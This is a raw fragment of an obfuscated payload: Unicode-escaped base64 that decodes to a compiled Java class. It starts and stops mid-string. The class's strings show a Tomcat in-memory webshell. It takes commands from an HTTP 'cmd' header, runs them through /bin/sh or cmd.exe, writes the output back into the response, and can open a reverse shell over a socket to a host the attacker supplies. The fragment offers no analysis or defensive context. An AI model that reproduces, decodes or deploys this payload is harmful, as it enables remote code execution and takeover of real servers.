u0042\u0041\u0041\u005a\u0030\u0059\u0058\u004a\u006e\u005a\u0058\u0051\u0042\u0041\u0042\u004a\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0062\u006d\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u005a\u0030\u0061\u0047\u006c\u007a\u004a\u0044\u0041\u0042\u0041\u0041\u0064\u006f\u0059\u0057\u0035\u006b\u0062\u0047\u0056\u0079\u0041\u0051\u0041\u0065\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0035\u0076\u0055\u0033\u0056\u006a\u0061\u0045\u005a\u0070\u005a\u0057\u0078\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0042\u0041\u0054\u0055\u0042\u0041\u0041\u005a\u006e\u0062\u0047\u0039\u0069\u0059\u0057\u0077\u0042\u0041\u0041\u0070\u0077\u0063\u006d\u0039\u006a\u005a\u0058\u004e\u007a\u0062\u0033\u004a\u007a\u0041\u0051\u0041\u004f\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u0078\u0070\u0063\u0033\u0051\u004d\u0041\u0055\u0049\u0042\u0051\u0077\u0063\u0042\u0052\u0041\u0077\u0042\u0052\u0051\u0046\u0047\u0044\u0041\u0046\u0048\u0041\u0055\u0067\u0042\u0041\u0041\u004e\u0079\u005a\u0058\u0045\u0042\u0041\u0041\u0074\u006e\u005a\u0058\u0052\u0053\u005a\u0058\u004e\u0077\u0062\u0032\u0035\u007a\u005a\u0051\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0077\u0077\u0042\u0053\u0051\u0046\u004b\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0041\u0063\u0042\u0053\u0077\u0077\u0042\u0054\u0041\u0046\u004e\u0041\u0051\u0041\u004a\u005a\u0032\u0056\u0030\u0053\u0047\u0056\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u0077\u0045\u0041\u0041\u0032\u004e\u0074\u005a\u0041\u0077\u0041\u006d\u0067\u0043\u0062\u0044\u0041\u0046\u004f\u0041\u0055\u0038\u0042\u0041\u0041\u006c\u007a\u005a\u0058\u0052\u0054\u0064\u0047\u0046\u0030\u0064\u0058\u004d\u0048\u0041\u0056\u0041\u004d\u0041\u0056\u0045\u0042\u0055\u0067\u0077\u0042\u0055\u0077\u0046\u0055\u0041\u0051\u0041\u006b\u0062\u0033\u004a\u006e\u004c\u006d\u0046\u0077\u0059\u0057\u004e\u006f\u005a\u0053\u0035\u0030\u0062\u0032\u0031\u006a\u0059\u0058\u0051\u0075\u0064\u0058\u0052\u0070\u0062\u0043\u0035\u0069\u0064\u0057\u0059\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004e\u006f\u0064\u0057\u0035\u0072\u0044\u0041\u0043\u0057\u0041\u004a\u0063\u004d\u0041\u0056\u0055\u0042\u0053\u0041\u0045\u0041\u0043\u0048\u004e\u006c\u0064\u0045\u004a\u0035\u0064\u0047\u0056\u007a\u0041\u0051\u0041\u0043\u0057\u0030\u0049\u004d\u0041\u0056\u0059\u0042\u0053\u0067\u0045\u0041\u0042\u0032\u0052\u0076\u0056\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0042\u004e\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0041\u0051\u0041\u0054\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0075\u0061\u0057\u0038\u0075\u0051\u006e\u006c\u0030\u005a\u0055\u004a\u0031\u005a\u006d\u005a\u006c\u0063\u0067\u0045\u0041\u0042\u0048\u0064\u0079\u0059\u0058\u0041\u004d\u0041\u0056\u0063\u0041\u006c\u0077\u0045\u0041\u0049\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0035\u0076\u0064\u0045\u005a\u0076\u0064\u0057\u0035\u006b\u0052\u0058\u0068\u006a\u005a\u0058\u0042\u0030\u0061\u0057\u0039\u0075\u0044\u0041\u0046\u0059\u0041\u0056\u006b\u0048\u0041\u0056\u006f\u0042\u0041\u0041\u0041\u004d\u0041\u0056\u0073\u0042\u0058\u0041\u0045\u0041\u0045\u0047\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0062\u006d\u0039\u0030\u0049\u0047\u0035\u0031\u0062\u0047\u0077\u004d\u0041\u0056\u0030\u0042\u0050\u0067\u0045\u0041\u0042\u0053\u004d\u006a\u0049\u0079\u004d\u006a\u0044\u0041\u0046\u0065\u0041\u0056\u0038\u004d\u0041\u004a\u0034\u0041\u006d\u0077\u0045\u0041\u0041\u0054\u006f\u004d\u0041\u0057\u0041\u0042\u0059\u0051\u0045\u0041\u0049\u006d\u004e\u0076\u0062\u0057\u0031\u0068\u0062\u006d\u0051\u0067\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0053\u0042\u006f\u0062\u0033\u004e\u0030\u0049\u0047\u005a\u0076\u0063\u006d\u0031\u0068\u0064\u0043\u0042\u006c\u0063\u006e\u004a\u0076\u0063\u0069\u0045\u004d\u0041\u0049\u0030\u0041\u006a\u0067\u0077\u0042\u0059\u0067\u0046\u006a\u0044\u0041\u0043\u0050\u0041\u004a\u0041\u0042\u0041\u0042\u0042\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0044\u0041\u0043\u0052\u0041\u0057\u0051\u004d\u0041\u0057\u0055\u0041\u006b\u0067\u0045\u0041\u0042\u0053\u0051\u006b\u004a\u0043\u0051\u006b\u0041\u0051\u0041\u0053\u005a\u006d\u006c\u0073\u005a\u0053\u0042\u006d\u0062\u0033\u004a\u0074\u0059\u0058\u0051\u0067\u005a\u0058\u004a\u0079\u0062\u0033\u0049\u0068\u0044\u0041\u0043\u0063\u0041\u004a\u0030\u0042\u0041\u0041\u0056\u0041\u0051\u0045\u0042\u0041\u0051\u0041\u0077\u0041\u006e\u0077\u0043\u0062\u0041\u0051\u0041\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0070\u0062\u0079\u0039\u0047\u0061\u0057\u0078\u006c\u0044\u0041\u0043\u0052\u0041\u0057\u0059\u0042\u0041\u0042\u0068\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u005a\u0070\u0062\u0047\u0056\u0050\u0064\u0058\u0052\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u004d\u0041\u004a\u0045\u0042\u005a\u0077\u0077\u0041\u006f\u0077\u0043\u006b\u0044\u0041\u0043\u0063\u0041\u0057\u0067\u004d\u0041\u0057\u006b\u0041\u006b\u0067\u0077\u0042\u0061\u0067\u0043\u0053\u0044\u0041\u0046\u0072\u0041\u0054\u0034\u004d\u0041\u0057\u0077\u0042\u0050\u0067\u0077\u0042\u0062\u0051\u0046\u0075\u0041\u0051\u0041\u0048\u0062\u0033\u004d\u0075\u0062\u006d\u0046\u0074\u005a\u0051\u0063\u0042\u0062\u0077\u0077\u0042\u0063\u0041\u0043\u0062\u0044\u0041\u0046\u0078\u0041\u0054\u0034\u0042\u0041\u0041\u004e\u0033\u0061\u0057\u0034\u0042\u0041\u0041\u0052\u0077\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0043\u004c\u0057\u0034\u0042\u0041\u0042\u0064\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u0067\u0077\u0042\u0063\u0067\u0046\u007a\u0041\u0051\u0041\u0046\u0049\u0043\u0031\u0075\u0049\u0044\u0051\u0042\u0041\u0041\u0049\u0076\u0059\u0077\u0045\u0041\u0042\u0053\u0041\u0074\u0064\u0043\u0041\u0030\u0041\u0051\u0041\u0043\u0063\u0032\u0067\u0042\u0041\u0041\u0049\u0074\u0059\u0077\u0063\u0042\u0064\u0041\u0077\u0042\u0064\u0051\u0046\u0032\u0044\u0041\u0043\u0066\u0041\u0058\u0063\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0033\u0056\u0030\u0061\u0057\u0077\u0076\u0055\u0032\u004e\u0068\u0062\u006d\u0035\u006c\u0063\u0067\u0063\u0042\u0065\u0041\u0077\u0042\u0065\u0051\u0046\u0036\u0044\u0041\u0043\u0052\u0041\u0058\u0073\u0042\u0041\u0041\u004a\u0063\u0059\u0051\u0077\u0042\u0066\u0041\u0046\u0039\u0044\u0041\u0046\u0048\u0041\u0054\u0034\u004d\u0041\u0058\u0034\u0042\u0065\u0067\u0077\u0042\u0066\u0077\u0043\u0053\u0041\u0051\u0041\u0048\u004c\u0032\u004a\u0070\u0062\u0069\u0039\u007a\u0061\u0041\u0045\u0041\u0042\u0032\u004e\u0074\u005a\u0043\u0035\u006c\u0065\u0047\u0055\u004d\u0041\u004a\u0038\u0042\u0067\u0041\u0045\u0041\u0044\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u006d\u0056\u0030\u004c\u0031\u004e\u0076\u0059\u0032\u0074\u006c\u0064\u0041\u0077\u0041\u006b\u0051\u0043\u0068\u0044\u0041\u0047\u0042\u0041\u0059\u0049\u004d\u0041\u0059\u004d\u0042\u0052\u0067\u0063\u0042\u0068\u0041\u0077\u0042\u0068\u0051\u0047\u0047\u0044\u0041\u0047\u0048\u0041\u0059\u0059\u0048\u0041\u0059\u0067\u004d\u0041\u004a\u0077\u0042\u0069\u0051\u0077\u0042\u0069\u0067\u0047\u004c\u0044\u0041\u0047\u004d\u0041\u0059\u0059\u004d\u0041\u0059\u0030\u0042\u0050\u0067\u0077\u0042\u006a\u0067\u0047\u0047\u0044\u0041\u0043\u0067\u0041\u004b\u0045\u0042\u0041\u0042\u005a\u007a\u0064\u0057\u0034\u0075\u0062\u0057\u006c\u007a\u0059\u0079\u0035\u0043\u0051\u0056\u004e\u0046\u004e\u006a\u0052\u0045\u005a\u0057\u004e\u0076\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u004d\u005a\u0047\u0056\u006a\u0062\u0032\u0052\u006c\u0051\u006e\u0056\u006d\u005a\u006d\u0056\u0079\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0035\u0031\u0064\u0047\u006c\u0073\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0045\u0052\u006c\u0059\u0032\u0039\u006b\u005a\u0058\u0049\u0042\u0041\u0043\u005a\u0076\u0063\u006d\u0063\u0075\u0059\u0058\u0042\u0068\u0059\u0032\u0068\u006c\u004c\u006d\u004e\u0076\u0062\u0057\u0031\u0076\u0062\u006e\u004d\u0075\u0059\u0032\u0039\u006b\u005a\u0057\u004d\u0075\u0059\u006d\u006c\u0075\u0059\u0058\u004a\u0035\u004c\u006b\u004a\u0068\u0063\u0032\u0055\u0032\u004e\u0041\u0045\u0041\u0041\u006b\u0045\u0030\u0041\u0051\u0041\u004e\u0059\u0033\u0056\u0079\u0063\u006d\u0056\u0075\u0064\u0046\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0041\u0045\u0041\u0046\u0043\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0042\u0041\u0042\u006b\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0056\u0047\u0068\u0079\u005a\u0057\u0046\u006b\u0052\u0033\u004a\u0076\u0064\u0058\u0041\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0042\u0041\u0042\u004d\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0051\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u0047\u0061\u0057\u0056\u0073\u005a\u0041\u0045\u0041\u004c\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u004f\u0077\u0045\u0041\u0046\u0032\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0079\u005a\u0057\u005a\u0073\u005a\u0057\u004e\u0030\u004c\u0030\u005a\u0070\u005a\u0057\u0078\u006b\u0041\u0051\u0041\u004e\u0063\u0032\u0056\u0030\u0051\u0057\u004e\u006a\u005a\u0058\u004e\u007a\u0061\u0057\u004a\u0073\u005a\u0051\u0045\u0041\u0042\u0043\u0068\u0061\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u006e\u005a\u0058\u0051\u0042\u0041\u0043\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0077\u0045\u0041\u0042\u0032\u0064\u006c\u0064\u0045\u0035\u0068\u0062\u0057\u0055\u0042\u0041\u0042\u0051\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u0047\u004e\u0076\u0062\u006e\u0052\u0068\u0061\u0057\u0035\u007a\u0041\u0051\u0041\u0062\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0068\u0068\u0063\u006c\u004e\u006c\u0063\u0058\u0056\u006c\u0062\u006d\u004e\u006c\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u004e\u005a\u0032\u0056\u0030\u0055\u0033\u0056\u0077\u005a\u0058\u004a\u006a\u0062\u0047\u0046\u007a\u0063\u0077\u0045\u0041\u0043\u0047\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u0041\u0051\u0041\u0057\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0030\u006c\u0030\u005a\u0058\u004a\u0068\u0064\u0047\u0039\u0079\u004f\u0077\u0045\u0041\u0045\u006d\u0070\u0068\u0064\u006d\u0045\u0076\u0064\u0058\u0052\u0070\u0062\u0043\u0039\u004a\u0064\u0047\u0056\u0079\u0059\u0058\u0052\u0076\u0063\u0067\u0045\u0041\u0042\u0032\u0068\u0068\u0063\u0030\u0035\u006c\u0065\u0048\u0051\u0042\u0041\u0041\u004d\u006f\u004b\u0056\u006f\u0042\u0041\u0041\u0052\u0075\u005a\u0058\u0068\u0030\u0041\u0051\u0041\u0055\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0042\u0041\u0041\u006c\u006e\u005a\u0058\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0045\u0041\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0051\u0032\u0078\u0068\u0063\u0033\u004d\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0063\u006d\u0056\u006d\u0062\u0047\u0056\u006a\u0064\u0043\u0039\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0037\u0041\u0051\u0041\u0059\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0033\u004a\u006c\u005a\u006d\u0078\u006c\u0059\u0033\u0051\u0076\u0054\u0057\u0056\u0030\u0061\u0047\u0039\u006b\u0041\u0051\u0041\u0047\u0061\u0057\u0035\u0032\u0062\u0032\u0074\u006c\u0041\u0051\u0041\u0035\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0054\u0032\u004a\u0071\u005a\u0057\u004e\u0030\u004f\u0031\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0050\u0059\u006d\u0070\u006c\u0059\u0033\u0051\u0037\u0041\u0051\u0041\u0049\u005a\u0032\u0056\u0030\u0051\u006e\u006c\u0030\u005a\u0058\u004d\u0042\u0041\u0041\u0051\u006f\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u006c\u0075\u0064\u0047\u0056\u006e\u005a\u0058\u0049\u0042\u0041\u0041\u0052\u0055\u0057\u0056\u0042\u0046\u0041\u0051\u0041\u0052\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0073\u0042\u0041\u0041\u0064\u0032\u0059\u0057\u0078\u0031\u005a\u0055\u0039\u006d\u0041\u0051\u0041\u0057\u004b\u0045\u006b\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0043\u0032\u0035\u006c\u0064\u0030\u006c\u0075\u0063\u0033\u0052\u0068\u0062\u006d\u004e\u006c\u0041\u0051\u0041\u0052\u005a\u0032\u0056\u0030\u0052\u0047\u0056\u006a\u0062\u0047\u0046\u0079\u005a\u0057\u0052\u004e\u005a\u0058\u0052\u006f\u0062\u0032\u0051\u0042\u0041\u0041\u0064\u006d\u0062\u0033\u004a\u004f\u0059\u0057\u0031\u006c\u0041\u0051\u0041\u0056\u005a\u0032\u0056\u0030\u0051\u0032\u0039\u0075\u0064\u0047\u0056\u0034\u0064\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u0041\u0051\u0041\u005a\u004b\u0043\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u0054\u0047\u0039\u0068\u005a\u0047\u0056\u0079\u004f\u0077\u0045\u0041\u0046\u0057\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u0030\u0078\u0076\u0059\u0057\u0052\u006c\u0063\u0067\u0045\u0041\u0042\u006d\u0056\u0078\u0064\u0057\u0046\u0073\u0063\u0077\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u0039\u0069\u0061\u006d\u0056\u006a\u0064\u0044\u0073\u0070\u0057\u0067\u0045\u0041\u0042\u0048\u0052\u0079\u0061\u0057\u0030\u0042\u0041\u0041\u0070\u007a\u0064\u0047\u0046\u0079\u0064\u0048\u004e\u0058\u0061\u0058\u0052\u006f\u0041\u0051\u0041\u0056\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u0061\u0041\u0051\u0041\u0046\u0063\u0033\u0042\u0073\u0061\u0058\u0051\u0042\u0041\u0043\u0063\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0068\u0077\u0059\u0058\u004a\u007a\u005a\u0055\u006c\u0075\u0064\u0041\u0045\u0041\u0046\u0053\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0053\u0051\u0045\u0041\u0046\u0079\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004a\u0031\u0062\u006d\u0035\u0068\u0059\u006d\u0078\u006c\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u0046\u0063\u0033\u0052\u0068\u0063\u006e\u0051\u0042\u0041\u0042\u0055\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0059\u0042\u0041\u0042\u0045\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0052\u006d\u006c\u0073\u005a\u0054\u0073\u0070\u0056\u0067\u0045\u0041\u0042\u0053\u0068\u0062\u0051\u0069\u006c\u0057\u0041\u0051\u0041\u0046\u005a\u006d\u0078\u0031\u0063\u0032\u0067\u0042\u0041\u0041\u0056\u006a\u0062\u0047\u0039\u007a\u005a\u0051\u0045\u0041\u0043\u0048\u0052\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0051\u0057\u004a\u007a\u0062\u0032\u0078\u0031\u0064\u0047\u0056\u0051\u0059\u0058\u0052\u006f\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0077\u0062\u0047\u0046\u006a\u005a\u0051\u0045\u0041\u0052\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0074\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u006f\u0059\u0058\u004a\u0054\u005a\u0058\u0046\u0031\u005a\u0057\u0035\u006a\u005a\u0054\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0051\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0035\u0063\u0033\u0052\u006c\u0062\u0051\u0045\u0041\u0043\u0032\u0064\u006c\u0064\u0046\u0042\u0079\u0062\u0033\u0042\u006c\u0063\u006e\u0052\u0035\u0041\u0051\u0041\u004c\u0064\u0047\u0039\u004d\u0062\u0033\u0064\u006c\u0063\u006b\u004e\u0068\u0063\u0032\u0055\u0042\u0041\u0041\u005a\u0068\u0063\u0048\u0042\u006c\u0062\u006d\u0051\u0042\u0041\u0043\u0030\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u0051\u006e\u0056\u0070\u0062\u0047\u0052\u006c\u0063\u006a\u0073\u0042\u0041\u0042\u0046\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0051\u0045\u0041\u0043\u006d\u0064\u006c\u0064\u0046\u004a\u0031\u0062\u006e\u0052\u0070\u0062\u0057\u0055\u0042\u0041\u0042\u0055\u006f\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0064\u0047\u006c\u0074\u005a\u0054\u0073\u0042\u0041\u0043\u0067\u006f\u0057\u0030\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0052\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0042\u0041\u0041\u0035\u006e\u005a\u0058\u0052\u004a\u0062\u006e\u0042\u0031\u0064\u0046\u004e\u0030\u0063\u006d\u0056\u0068\u0062\u0051\u0045\u0041\u0046\u0079\u0067\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0061\u0057\u0038\u0076\u0053\u0057\u0035\u0077\u0064\u0058\u0052\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0037\u0041\u0051\u0041\u0059\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u006c\u0076\u004c\u0030\u006c\u0075\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\u0057\u0046\u0074\u004f\u0079\u006c\u0057\u0041\u0051\u0041\u004d\u0064\u0058\u004e\u006c\u0052\u0047\u0056\u0073\u0061\u0057\u0031\u0070\u0064\u0047\u0056\u0079\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0031\u0064\u0047\u006c\u0073\u004c\u0031\u004e\u006a\u0059\u0057\u0035\u0075\u005a\u0058\u0049\u0037\u0041\u0051\u0041\u004f\u005a\u0032\u0056\u0030\u0052\u0058\u004a\u0079\u0062\u0033\u004a\u0054\u0064\u0048\u004a\u006c\u0059\u0057\u0030\u0042\u0041\u0041\u0064\u006b\u005a\u0058\u004e\u0030\u0063\u006d\u0039\u0035\u0041\u0051\u0041\u006e\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u0042\u0079\u0062\u0032\u004e\u006c\u0063\u0033\u004d\u0037\u0041\u0051\u0041\u0050\u005a\u0032\u0056\u0030\u0054\u0033\u0056\u0030\u0063\u0048\u0056\u0030\u0055\u0033\u0052\u0079\u005a\